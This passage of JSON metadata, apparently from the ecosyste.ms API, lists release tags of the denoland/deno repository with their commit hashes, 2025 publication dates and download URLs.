rl":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":n